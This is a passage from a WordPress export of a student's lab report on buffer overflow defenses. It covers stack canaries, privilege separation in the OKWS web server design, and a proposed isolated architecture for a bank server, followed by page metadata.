class=\"brush: bash; title: ; notranslate\" title=\"\">\n$ gcc server.c -o server\n<\/pre><\/div>\n\n\n<p>In the lab report, please write down the size of gap between auth\u2019s old ebp field and local variables. Explain in more detail how you get this number. Please write down the content placed in this gap and explain how it prevents buffer overflow attacks.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<p>This gap is called Stack Canary. It detects modification of return address on stack before it is used by RET. Compiler generates code that pushes a \u201ccanary\u201d value on stack at function entry, pops and checks values before return.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"7_Task_5_Containing_Successful_Attacks\"><\/span>7 Task 5: Containing Successful Attacks<span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Question 5.1: Privilege separation and isolation are two key principles to make system robust<br>against successful attacks. Similar with the Google security architecture, OKWS is a web service system that practices these two principles. Please read the paper of OKWS and watch the online video of MIT 6.858 2020 Lecture 5 at tinyurl.com\/sr3jm2bt if necessary. In the lab report, please briefly explain the Figure 1 in the OKWS paper and discuss what is its security benefits.<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<p>The main feature of OKWS is to split the web server process into multiple processes, each with different, minimal privileges, running as different user IDs. It uses UNIX isolation mechanisms to prevent subsystems from reading or modifying each other\u2019s data. In the figure 1 of the OKWS paper, \u2018okd\u2019 process parses user input, holds no sensitive data. \u2018svci\u2019 process parses user input for one service and it runs in chroot()ed \u201cjail\u201d. The chroot()ed jail has no access to any of filesystem, like it can\u2019t access to the many UNIX setuid-root programs, or any sensitive data elsewhere on disk. It has to priori set up all system files needed by process in directory, e.g., shared libraries, etc. The OKWS database proxy(data<sub>2<\/sub>) only accepts authenticated requests for subset of narrow RPC interface which can read sensitive data. All of the above feature can both enhance the privilege separation and isolation among the web process. Compared to one process per user, OKWS uses one process per service only which can balance the performance and security at the same time. So even any small component in the system contains vulnerability, attacker has to take a lot of time to exploit other process as all subsystem in child process are using minimal privileges so it can make sure that even if a non-privileged process is compromised, there is nothing for the malware\/attacker to do and nowhere else for it to go as well.<\/p>\n\n\n\n<p>Question 5.2: The bank server program used in this lab is vulnerable because all services (i.e.,<br>login and other request handlers) are implemented in one program. Once one vulnerability is exploited by the attacker, the whole system corrupts. Based on your understanding of the Google security architecture and the OKWS paper, describe a solution to ensure the security of the bank server\/client even if the login service has vulnerabilities that can be exploited by the attacker. You answer should include sufficient explanations and provide a figure of the architecture of the modified system (i.e., how the system is divided into isolated services, how they connect and interact with each other, etc.).<\/p>\n\n\n\n<p><span style=\"text-decoration: underline;\">My Answer:<\/span><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-opt-id=1353383107  loading=\"lazy\" decoding=\"async\" width=\"864\" height=\"603\" src=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-22.png\" alt=\"\" class=\"wp-image-238\" srcset=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:864\/h:603\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-22.png 864w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:300\/h:209\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-22.png 300w, https:\/\/mlcznkdztmb6.i.optimole.com\/w:768\/h:536\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/image-22.png 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<p>The entire server isolation design can be divided into two parts. One is Encryption Zone and Isolated Server Zone. All server includes the database is under the network access group. It is a combined protection partially studied from OKWS and Google security architecture.<\/p>\n\n\n\n<p>All the data will be encrypted in the Encryption Zone. In every secure TLS\/SSL connection, information sent back and forth between the client and the front-end server will be encrypted using a special secret key that is generated by the client during the TLS handshake. Without this secret key, neither side can decrypt any messages that are encrypted by the other side. So, it can reduce the chance that packet is being eavesdropping or altered when entering the encryption zone. Apart from that, the firewall is different from traditional perimeter one. It is network-based firewalls which provide a richer environment for filtering high-capacity attacks and unauthorized packets from the outside network. The firewall rules will be as tight as possible. Only allow well-documented and required traffic (ingress and egress) from the client computer, and deny all others.<\/p>\n\n\n\n<p>The front-end server and back-end server work together as a reverse proxy network which is a bit similar to content delivery network (CDN) in Google, but not exactly same. With a reverse proxy, all requests from clients\u2019 computer will go directly to front-end server first, and front-end server will send its requests to and receive responses from back-end server. Front-end server will then pass along the appropriate responses to clients\u2019 computer. Also, only the back-end server has the right to read and edit the database. This will be similar to the OKWS setup, first layer of the network has just enough access privileges to receive and communicate to the deeper layer. The front-end server and clients\u2019 computer can never directly access to the database and lack the privileges to do so. For example, an attacker who gained access to front-end server cannot access the contents of the database either. Because the front-end server acts like a communication channel instead of a processor service.<\/p>\n\n\n\n<p>In conclusion, all the authorization is determined by membership in a network access group. Access to the database server must be restricted to only those clients that have a business requirement to access the data. This includes the service accounts that are used by the front-end servers, and administrators of the database. In addition, access is only granted when it is sent from an authorized computer and all the action will be recorded and stored when investigation is needed. All network traffic from and to the database must be encrypted or it will be rejected. As client computers and front-end server are not members of the network access group, they cannot access the isolated servers directly.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This is an individual project of CS3273 &#8211; Data Protection and System Security. I did the project in my year 2 2021\/22 Semester B. Course Instructor: Dr. Jun HUANG Project &hellip; <a href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/\" class=\"more-link\"><span>Continue reading<span class=\"screen-reader-text\">Buffer Overflow Attacks and Defenses<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":326,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[75,3],"tags":[25,27,28,13,21],"class_list":["post-226","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","category-proj","tag-2021-22-semester-b","tag-cs3273","tag-data-protection-and-system-security","tag-data-science","tag-year-2"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Buffer Overflow Attacks and Defenses - Philip\u2019s Data Science Diary<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/\" \/>\n<meta property=\"og:locale\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Buffer Overflow Attacks and Defenses - Philip\u2019s Data Science Diary\" \/>\n<meta property=\"og:description\" content=\"This is an individual project of CS3273 &#8211; Data Protection and System Security. I did the project in my year 2 2021\/22 Semester B. Course Instructor: Dr. Jun HUANG Project &hellip; Continue readingBuffer Overflow Attacks and Defenses\" \/>\n<meta property=\"og:url\" content=\"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/\" \/>\n<meta property=\"og:site_name\" content=\"Philip\u2019s Data Science Diary\" \/>\n<meta property=\"article:published_time\" content=\"2022-03-18T14:20:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-03-06T01:52:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2022\/03\/Buffer-Overflow-Attacks-and-Defenses.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Philip\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Philip\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimated reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/\"},\"author\":{\"name\":\"Philip\",\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/#\\\/schema\\\/person\\\/ef4f7cedd9b3bde11e126c4dbe1f8414\"},\"headline\":\"Buffer Overflow Attacks and Defenses\",\"datePublished\":\"2022-03-18T14:20:00+00:00\",\"dateModified\":\"2024-03-06T01:52:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/\"},\"wordCount\":3833,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/#\\\/schema\\\/person\\\/ef4f7cedd9b3bde11e126c4dbe1f8414\"},\"image\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2022\\/03\\/Buffer-Overflow-Attacks-and-Defenses.png\",\"keywords\":[\"2021\\\/22 Semester B\",\"CS3273\",\"Data Protection and System Security\",\"Data Science\",\"Year 2\"],\"articleSection\":[\"Cybersecurity\",\"Projects\"],\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/\",\"url\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/\",\"name\":\"Buffer Overflow Attacks and Defenses - Philip\u2019s Data Science Diary\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2022\\/03\\/Buffer-Overflow-Attacks-and-Defenses.png\",\"datePublished\":\"2022-03-18T14:20:00+00:00\",\"dateModified\":\"2024-03-06T01:52:32+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#breadcrumb\"},\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#primaryimage\",\"url\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2022\\/03\\/Buffer-Overflow-Attacks-and-Defenses.png\",\"contentUrl\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2022\\/03\\/Buffer-Overflow-Attacks-and-Defenses.png\",\"width\":1920,\"height\":1080},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/2022\\\/03\\\/18\\\/buffer-overflow-attacks-and-defenses\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Buffer Overflow Attacks and Defenses\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/#website\",\"url\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/\",\"name\":\"Philip\u2019s University Data Science Journey\",\"description\":\"Navigating Data Science: From Classroom to Career\",\"publisher\":{\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/#\\\/schema\\\/person\\\/ef4f7cedd9b3bde11e126c4dbe1f8414\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-GB\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/#\\\/schema\\\/person\\\/ef4f7cedd9b3bde11e126c4dbe1f8414\",\"name\":\"Philip\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2024\\/03\\/favicon.png\",\"url\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2024\\/03\\/favicon.png\",\"contentUrl\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2024\\/03\\/favicon.png\",\"width\":16,\"height\":16,\"caption\":\"Philip\"},\"logo\":{\"@id\":\"https:\\/\\/philip.twinight.co\\/portfolio\\/wp-content\\/uploads\\/2024\\/03\\/favicon.png\"},\"description\":\"Data Scientist &amp; Systems Engineer. Graduated from City University of Hong Kong. Previously founded Twinight Limited as CTO, developing AI investment analytics and automated trading solutions. Currently working as a Test and Integration Engineer on a Vessel Traffic Service (VTS) system in the maritime industry since December 2024.\",\"sameAs\":[\"https:\\\/\\\/philip.twinight.co\\\/portfolio\"],\"url\":\"https:\\\/\\\/philip.twinight.co\\\/portfolio\\\/index.php\\\/author\\\/philip\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Buffer Overflow Attacks and Defenses - Philip\u2019s Data Science Diary","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/","og_locale":"en_GB","og_type":"article","og_title":"Buffer Overflow Attacks and Defenses - Philip\u2019s Data Science Diary","og_description":"This is an individual project of CS3273 &#8211; Data Protection and System Security. I did the project in my year 2 2021\/22 Semester B. Course Instructor: Dr. Jun HUANG Project &hellip; Continue readingBuffer Overflow Attacks and Defenses","og_url":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/","og_site_name":"Philip\u2019s Data Science Diary","article_published_time":"2022-03-18T14:20:00+00:00","article_modified_time":"2024-03-06T01:52:32+00:00","og_image":[{"width":1920,"height":1080,"url":"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2022\/03\/Buffer-Overflow-Attacks-and-Defenses.png","type":"image\/png"}],"author":"Philip","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Philip","Estimated reading time":"19 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#article","isPartOf":{"@id":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/"},"author":{"name":"Philip","@id":"https:\/\/philip.twinight.co\/portfolio\/#\/schema\/person\/ef4f7cedd9b3bde11e126c4dbe1f8414"},"headline":"Buffer Overflow Attacks and Defenses","datePublished":"2022-03-18T14:20:00+00:00","dateModified":"2024-03-06T01:52:32+00:00","mainEntityOfPage":{"@id":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/"},"wordCount":3833,"commentCount":0,"publisher":{"@id":"https:\/\/philip.twinight.co\/portfolio\/#\/schema\/person\/ef4f7cedd9b3bde11e126c4dbe1f8414"},"image":{"@id":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#primaryimage"},"thumbnailUrl":"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2022\/03\/Buffer-Overflow-Attacks-and-Defenses.png","keywords":["2021\/22 Semester B","CS3273","Data Protection and System Security","Data Science","Year 2"],"articleSection":["Cybersecurity","Projects"],"inLanguage":"en-GB","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/","url":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/","name":"Buffer Overflow Attacks and Defenses - Philip\u2019s Data Science Diary","isPartOf":{"@id":"https:\/\/philip.twinight.co\/portfolio\/#website"},"primaryImageOfPage":{"@id":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#primaryimage"},"image":{"@id":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#primaryimage"},"thumbnailUrl":"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2022\/03\/Buffer-Overflow-Attacks-and-Defenses.png","datePublished":"2022-03-18T14:20:00+00:00","dateModified":"2024-03-06T01:52:32+00:00","breadcrumb":{"@id":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#breadcrumb"},"inLanguage":"en-GB","potentialAction":[{"@type":"ReadAction","target":["https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/"]}]},{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#primaryimage","url":"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2022\/03\/Buffer-Overflow-Attacks-and-Defenses.png","contentUrl":"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2022\/03\/Buffer-Overflow-Attacks-and-Defenses.png","width":1920,"height":1080},{"@type":"BreadcrumbList","@id":"https:\/\/philip.twinight.co\/portfolio\/index.php\/2022\/03\/18\/buffer-overflow-attacks-and-defenses\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/philip.twinight.co\/portfolio\/"},{"@type":"ListItem","position":2,"name":"Buffer Overflow Attacks and Defenses"}]},{"@type":"WebSite","@id":"https:\/\/philip.twinight.co\/portfolio\/#website","url":"https:\/\/philip.twinight.co\/portfolio\/","name":"Philip\u2019s University Data Science Journey","description":"Navigating Data Science: From Classroom to Career","publisher":{"@id":"https:\/\/philip.twinight.co\/portfolio\/#\/schema\/person\/ef4f7cedd9b3bde11e126c4dbe1f8414"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/philip.twinight.co\/portfolio\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-GB"},{"@type":["Person","Organization"],"@id":"https:\/\/philip.twinight.co\/portfolio\/#\/schema\/person\/ef4f7cedd9b3bde11e126c4dbe1f8414","name":"Philip","image":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/favicon.png","url":"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/favicon.png","contentUrl":"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/favicon.png","width":16,"height":16,"caption":"Philip"},"logo":{"@id":"https:\/\/mlcznkdztmb6.i.optimole.com\/w:auto\/h:auto\/q:mauto\/f:best\/ig:avif\/https:\/\/philip.twinight.co\/portfolio\/wp-content\/uploads\/2024\/03\/favicon.png"},"description":"Data Scientist &amp; Systems Engineer. Graduated from City University of Hong Kong. Previously founded Twinight Limited as CTO, developing AI investment analytics and automated trading solutions. Currently working as a Test and Integration Engineer on a Vessel Traffic Service (VTS) system in the maritime industry since December 2024.","sameAs":["https:\/\/philip.twinight.co\/portfolio"],"url":"https:\/\/philip.twinight.co\/portfolio\/index.php\/author\/philip\/"}]}},"_links":{"self":[{"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/posts\/226","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/comments?post=226"}],"version-history":[{"count":7,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/posts\/226\/revisions"}],"predecessor-version":[{"id":341,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/posts\/226\/revisions\/341"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/media\/326"}],"wp:attachment":[{"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/media?parent=226"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/categories?post=226"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/philip.twinight.co\/portfolio\/index.php\/wp-json\/wp\/v2\/tags?post=226"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}